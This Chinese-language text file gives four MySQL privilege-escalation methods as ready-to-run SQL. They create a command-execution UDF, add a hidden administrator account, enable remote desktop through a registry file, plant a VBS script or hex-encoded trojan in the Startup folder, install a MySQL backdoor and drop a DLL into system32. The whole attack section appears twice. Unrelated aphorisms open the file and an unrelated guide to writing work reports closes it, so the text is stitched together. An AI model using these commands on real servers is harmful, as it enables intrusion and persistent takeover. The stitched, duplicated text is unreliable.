mysql提权总结方法四则.txt遇事潇洒一点，看世糊涂一点。相亲是经销，恋爱叫直销，抛绣球招亲则为围标。没有准备请不要开始，没有能力请不要承诺。爱情这东西，没得到可能是缺憾，不表白就会有遗憾，可是如果自不量力，就只能抱憾了。一 UDF提权

这类提权方法我想大家已经知道了，我大致写一下，具体语句如下：

create function cmdshell returns string soname 'udf.dll'

select cmdshell('net user iis_user 123!@#abcABC /add');

select cmdshell('net localgroup administrators iis_user /add');

select cmdshell('regedit /s d:\web\3389.reg');

drop function cmdshell;

select cmdshell('netstat -an');

二 VBS启动项提权

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"") " );

insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " );

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " );

select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

先在webshell里连接上数据库,建立表，将VBS写入表里，然后导入启动项，

如果UDF提权不行的话也可以尝试下这个方法，前提是要有ROOT权限，后面有个,0表示不弹出CMD窗口，安静的运行。

还可以这样写:

create table a (cmd BLOB);

insert into a values （CONVERT(木马的16进制代码,CHAR));

select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'

drop table a;

执行前3条语句，就可以将木马写进启动里了，前提是木马一定要是16进制，还有就是路径要是\\，因为windows会自动过滤掉一个\

三 Linx Mysql BackDoor提权

Linx Mysql Door

Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,

该后门安装后为Mysql增加一个可以执行系统命令的"state"函数,

并且随Mysql进程启动一个基于Dll的嗅探型后门,这个后门在Windows下拥有与Mysql一样的系统权限,

从而巧妙的实现了无端口,无进程,无服务的穿墙木马.

用法：将Mysql.php传到PHP服务器上,点击"自动安装Mysql BackDoor"，然后直接执行命令即可

四，MIX.DLL提权

create table temp_mix(abc longblob);

insert into temp_mix values(load_file('D:\\web\\udf.dll'));

select * from temp_mix into dumpfile 'C:\\Windows\\system32\\udf.dll'; create function MyCmd returns string soname 'udf.dll';

select MyCmd('net user');

drop table if exists temp_mix;

前三句主要目的是把DLL放到系统目录.第4句建立函数.然后就可以执行系统命令了。 而最容易出问题的就是第4句

can't open shared library 'udf.dll'(error 2);

就说下他.

先前的时候.有次提权.可以建立函数.也忘了什么原因了.需要重新建下这个函数 首先百度了下.说得是:

drop function MyCmd;

就可以删到已经建立的函数.测试了下

发现还是不行.然后继续找的时候.说这是MYSQL的一个BUG

可以执行如下语句:

delete from mysql.func where name='MyCmd';

测试了下成功了.前天再次盯着屏幕上的

can't open shared library 'udf.dll'

又看到了这条delete语句.我们知道delete就是删除.是删的表里的东西.删下表就可以删了函数了?

那反过来.建立函数是不是就是往表里插入一条新记录?而且是mysql.func.也就是mysql这个库里的func表.

呵呵.看名字也象.测试一番后.得出如下结果:

在提权的时候.建立函数显示

can't open shared library 'udf.dll'

就干脆跳过这句

执行另外一句.或者说.把第4句换成:

insert into mysql.func values('MyCmd',0,'udf.dll','function');说下func这个表的结构:4 列.name,return,dl,fun.第二列和第四列的名字记不大清楚了

但意思一样.有兴趣可以自己

select * from func;

下就知道了

第一列就是新建函数的名字.字符串.第二列是返回值.填0.第三列dl指函数所在的dll名字.字符串类型

这里为我们导到系统目录里的dll名.不一定是udf.dll.只要跟你导出的一样就行.第四列作用不清楚

但是填上funciton这个字符串就能用.应该是指这个是个函数吧...因为这只是个插入操作 所以只要是root.应该不会有错误的.后面的就一样了.

select MyCmd('whoami');

但是别急!

这里有个前提:需要重启MYSQL..我对MYSQL不了解.但是重启后新建的函数绝对可用.貌似有别的办法可以达到同样的效果

好象是flush.但是具体flush哪里.就不知道了.不过不是权限.也不是func表.试过了.而且MYSQL下

搜了很久也没找到root在MYSQL下通过命令重启的.总有种感觉.不用重启的.哪位对MYSQL熟悉的看到后如果知道有什么命令告诉小弟下...

根据我自己最近的渗透测试，发现无论是剑心写的还是其他mysql提权脚本，对HKEY_CURRENT_USER这个句柄都不支持，

如果服务器禁用了CMD，即使有ROOT，也无法用写注册表的方式来解禁，要是有大牛能写出来的话还望共享一下!

 

第二篇：mysql提权总结方法四则

一 UDF提权

这类提权方法我想大家已经知道了，我大致写一下，具体语句如下：

create function cmdshell returns string soname 'udf.dll'

select cmdshell('net user iis_user 123!@#abcABC /add');

select cmdshell('net localgroup administrators iis_user /add');

select cmdshell('regedit /s d:\web\3389.reg');

drop function cmdshell;

select cmdshell('netstat -an');

二 VBS启动项提权

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"") " );

insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " );

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " );

select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

先在webshell里连接上数据库,建立表，将VBS写入表里，然后导入启动项，

如果UDF提权不行的话也可以尝试下这个方法，前提是要有ROOT权限，后面有个,0表示不弹出CMD窗口，安静的运行。

还可以这样写:

create table a (cmd BLOB);

insert into a values （CONVERT(木马的16进制代码,CHAR));

select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'

drop table a;

执行前3条语句，就可以将木马写进启动里了，前提是木马一定要是16进制，还有就是路径要是\\，因为windows会自动过滤掉一个\

三 Linx Mysql BackDoor提权

Linx Mysql Door

Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,

该后门安装后为Mysql增加一个可以执行系统命令的"state"函数,

并且随Mysql进程启动一个基于Dll的嗅探型后门,这个后门在Windows下拥有与Mysql一样的系统权限,

从而巧妙的实现了无端口,无进程,无服务的穿墙木马.

用法：将Mysql.php传到PHP服务器上,点击"自动安装Mysql BackDoor"，然后直接执行命令即可

四，MIX.DLL提权

create table temp_mix(abc longblob);

insert into temp_mix values(load_file('D:\\web\\udf.dll'));

select * from temp_mix into dumpfile 'C:\\Windows\\system32\\udf.dll'; create function MyCmd returns string soname 'udf.dll';

select MyCmd('net user');

drop table if exists temp_mix;

前三句主要目的是把DLL放到系统目录.第4句建立函数.然后就可以执行系统命令了。 而最容易出问题的就是第4句

can't open shared library 'udf.dll'(error 2);

就说下他.

先前的时候.有次提权.可以建立函数.也忘了什么原因了.需要重新建下这个函数 首先百度了下.说得是:

drop function MyCmd;

就可以删到已经建立的函数.测试了下

发现还是不行.然后继续找的时候.说这是MYSQL的一个BUG

可以执行如下语句:

delete from mysql.func where name='MyCmd';

测试了下成功了.前天再次盯着屏幕上的

can't open shared library 'udf.dll'

又看到了这条delete语句.我们知道delete就是删除.是删的表里的东西.删下表就可以删了函数了?

那反过来.建立函数是不是就是往表里插入一条新记录?而且是mysql.func.也就是mysql这个库里的func表.

呵呵.看名字也象.测试一番后.得出如下结果:

在提权的时候.建立函数显示

can't open shared library 'udf.dll'

就干脆跳过这句

执行另外一句.或者说.把第4句换成:

insert into mysql.func values('MyCmd',0,'udf.dll','function');说下func这个表的结构:4 列.name,return,dl,fun.第二列和第四列的名字记不大清楚了

但意思一样.有兴趣可以自己

select * from func;

下就知道了

第一列就是新建函数的名字.字符串.第二列是返回值.填0.第三列dl指函数所在的dll名字.字符串类型

这里为我们导到系统目录里的dll名.不一定是udf.dll.只要跟你导出的一样就行.第四列作用不清楚

但是填上funciton这个字符串就能用.应该是指这个是个函数吧...因为这只是个插入操作 所以只要是root.应该不会有错误的.后面的就一样了.

select MyCmd('whoami');

但是别急!

这里有个前提:需要重启MYSQL..我对MYSQL不了解.但是重启后新建的函数绝对可用.貌似有别的办法可以达到同样的效果

好象是flush.但是具体flush哪里.就不知道了.不过不是权限.也不是func表.试过了.而且MYSQL下

搜了很久也没找到root在MYSQL下通过命令重启的.总有种感觉.不用重启的.哪位对MYSQL熟悉的看到后如果知道有什么命令告诉小弟下...

根据我自己最近的渗透测试，发现无论是剑心写的还是其他mysql提权脚本，对HKEY_CURRENT_USER这个句柄都不支持，

如果服务器禁用了CMD，即使有ROOT，也无法用写注册表的方式来解禁，要是有大牛能写出来的话还望共享一下!

 

第三篇：工作总结方法

就是把某一时期已经做过的工作，进行一次全面系统的总检查、总评价，进行一次具体的总分析、总研究；也就是看看取得了哪些成绩，存在哪些缺点和不足，有什么经验、提高。

（一）基本情况。

1．工作总结必须有情况的概述和叙述，有的比较简单，有的比较详细。这部分内容主要是对工作的主客观条件、有利和不利条件以及工作的环境和基础等进行分析。

2．成绩和缺点。这是总结的中心。总结的目的就是要肯定成绩，找出缺点。成绩有哪些，有多大，表现在哪些方面，是怎样取得的；缺点有多少，表现在哪些方面，是什么性质的，怎样产生的，都应讲清楚。

3．经验和教训。做过一件事，总会有经验和教训。为便于今后的工作，须对以往工作的经验和教训进行分析、研究、概括、集中，并上升到理论的高度来认识。

4．今后的打算。根据今后的工作任务和要求，吸取前一时期工作的经验和教训，明确努力方向，提出改进措施等。

（二）写好总结需要注意的问题

1．工作总结前要充分占有材料。 2．一定要实事求是，成绩不夸大，缺点不缩小，更不能弄虚作假。 3．条理要清楚。总结是写给人看的，条理不清，人们就看不下去，即使看了也不知其所以然，这样就达不到总结的目的

4．要剪裁得体，详略适宜。

5．工作总结的具体写作，可先议论，然后由专人写出初稿，再行讨论、修改。最好由主要负责人执笔，或亲自主持讨论、起草、修改